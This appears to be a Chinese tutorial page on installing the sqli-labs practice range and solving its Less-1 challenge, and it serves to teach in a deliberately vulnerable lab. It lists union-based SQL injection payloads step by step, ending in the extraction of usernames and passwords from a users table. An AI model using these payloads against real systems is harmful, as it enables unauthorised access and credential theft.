Sqli | 您所在的位置:网站首页 › sqli labs安装 › Sqli |
Sqli-labs-master靶场安装 1、将下载好的sqli-labs-master压缩包解压到phpstudy的网站根目录中(可以适当缩短文件名用来方便访问) 2、修改sql-connections文件夹中的配置文件db-creds.inc,将用户名和密码改为自己PHPstudy中mysql数据库的用户名和密码。 3、在浏览器中输入127.0.0.1/sqli-labs(此处sqli-labs为自己设置的文件夹名称)访问sqli-labs靶场并点击Setup/reset Database for labs创建数据库。 Less-1闯关步骤 安装好靶机就可以点击下方的题目开始闯关了 1、进入less-1 2、尝试输入?id=1' and '1'='1回显正常说明是字符型注入 3、依次输入?id=1' order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3 4、输入?id=-1' union select 1,2,3--+判断回显位(其中的-1是不存在的值,用以使后方代码union select 1,2,3执行) 5、输入?id=-1' union select 1,database(),3--+爆出数据库名 6、输入构造好的sql语句?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+爆出表名 7、输入?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+爆出users表的字段 8、输入?id=-1' union select 1,group_concat(username,0x2f,password),3 from users--+爆出username和password的字段值,并以/符号隔开。(0x2f为十六进制ASCII码) |
CopyRight 2018-2019 实验室设备网 版权所有 |